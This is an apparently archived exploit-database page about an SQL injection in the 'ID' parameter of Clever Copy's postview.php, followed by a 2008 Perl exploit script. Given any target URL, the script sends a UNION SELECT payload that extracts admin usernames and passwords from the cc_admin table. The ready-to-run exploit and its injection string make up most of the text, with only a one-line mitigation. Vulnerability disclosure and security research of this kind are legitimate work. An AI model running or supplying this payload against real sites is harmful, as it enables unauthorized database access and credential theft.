header-logo
Suggest Exploit
vendor:
postview.php
by:
U238
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: postview.php
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Clever Copy ‘postview.php’ SQL Injection Vulnerable Exploit

Clever Copy 'postview.php' is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. This vulnerability is due to insufficient sanitization of user-supplied input to the 'ID' parameter of the 'postview.php' script. An attacker can exploit this vulnerability by supplying a specially crafted SQL query to the 'ID' parameter of the 'postview.php' script.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

#!/usr/bin/perl  
# Clever Copy 'postview.php' SQL Injection Vulnerable Exploit Coded
# By U238 | Web - Designer Solutions Developer
# Thank you joss
# My Friends : ka0x - Marco Almeida - The_BekiR - fahn - Teyfik Cevik - Nettoxic - Caborz
# http://noexec.blogspot.com


print "\n\n0x0x0x0x0x0x0x0xx0x0x0x0x0x0x0x0x0x0x0x00x0x0x0x0x0x0x0xx0x\n\n"; 
print "\n\n# Clever Copy 'postview.php' SQL Injection Vulnerability #\n\n"; 
print "\n\n# This Bug Discovered By U28 in Exploit Completed #\n\n"; 
print "\n\n0x0x0x0x0x0x0x0xx0x0x0x0x0x0x0x0x0x0x0x00x0x0x0x0x0x0x0xx0x\n\n"; 

use strict;   
use LWP::UserAgent; 

my $victim = $ARGV[0]; 

 if(!$ARGV[0]) { 
    print "\n[x] Exploit Options\n"; 
    print "[x] U238 : setuid.noexec0x1[-]hotmail[+]com\n"; 
    print "[x] usage: perl examp.pl (domain)\n"; 
    print "[x] examp: http://target/path/\n\n"; 
    print "[x] Referance:https://www.securityfocus.com/bid/28437/info\n\n"; 
    exit(1); 
 }  
  sleep(3);
  sleep(1);
    print "\n[+] Baglanildi $victim...\n"; 
    my $cnx = LWP::UserAgent->new() or die; 
    my $go=$cnx->get($victim."/postview.php?ID='+union+select+username,concat(0x706173737764,char(58),password,0x2D2D2D,0x757365726E616D653ADA,username),1,5,username,username,6,username,username,9,username+from+cc_admin/*"); 
    if ($go->content =~ m/____(.*?)____/ms) { 
        print "$1\n"; 
    } else { 
        print "\n[-] exploit calismadi\n"; 
    }

# milw0rm.com [2008-04-26]